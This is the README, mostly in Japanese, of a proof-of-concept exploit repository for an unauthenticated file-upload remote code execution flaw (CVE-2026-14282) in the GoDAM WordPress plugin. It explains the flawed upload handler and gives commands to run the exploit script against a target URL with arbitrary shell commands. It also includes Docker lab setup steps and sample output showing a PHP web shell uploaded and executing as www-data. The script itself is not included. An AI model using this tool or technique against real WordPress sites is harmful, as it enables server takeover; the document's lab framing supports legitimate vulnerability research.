
GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)
著者: nullwhisper
用途: 認可されたセキュリティ調査 / 脆弱性検証のみ。
GoDAM WordPress プラグインバージョン <= 1.12.2 は、godam_record という WPForms フィールドを登録します。アップロードハンドラ save_video_file() は公開の wpforms_process_before_filter アクションにフックされるため、認証チェックの前に実行されます。このハンドラは攻撃者が制御する Content-Type ヘッダーを信頼し、MIME タイプが video/ で始まる限り PHP ファイルを受け入れ、それを Web 公開ディレクトリ wp-content/uploads/godam/wpforms/ に移動します。これにより、認証されていない攻撃者が任意の PHP コードをアップロードして実行できます。
.
├── cve_2026_14282_poc.py # Main PoC
├── lab/
│ ├── docker-compose.yml # WordPress lab
│ └── setup.php # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md
pip3 install -r requirements.txt
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
スクリプトは WPForms のフォーム ID と GoDAM フィールド ID を自動検出します。ページに複数のフォームが含まれる場合や検出に失敗した場合は、次を使用してください:
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
--form-id 4 --field-id 1 --cmd "whoami"
脆弱性のあるプラグインをダウンロードします(バイナリを再配布しないでください):
mkdir -p lab/wpforms-lite lab/godam
cd lab/wpforms-lite
wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
unzip wpforms-lite.latest-stable.zip
rm wpforms-lite.latest-stable.zip
cd ../godam
wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
unzip godam.1.12.2.zip
rm godam.1.12.2.zip
cd ../..
ラボを起動します:
cd lab
docker compose up -d
http://127.0.0.1:8092 で WordPress インストーラーを完了します。
プラグインをインストールして有効化し、フォームとテストページを作成します:
docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
docker exec -i lab-wpcli-1 php /tmp/setup.php
PoC を実行します:
python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
WordPress 6.8 + WPForms Lite 最新版 + GoDAM 1.12.2 でテスト済み。
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED
このリポジトリには PoC とラボのオーケストレーションファイルのみが含まれています。脆弱性のあるプラグインバイナリは肥大化と配布の問題を避けるために除外されています。自身のラボ用に WordPress.org から該当する脆弱性のあるバージョンをダウンロードしてください。
このツールは許可されたセキュリティテストおよび研究専用です。所有していないシステム、またはテストする明示的な許可がないシステムに対して使用しないでください。著者は、このコードによって引き起こされた誤用や損害について責任を負いません。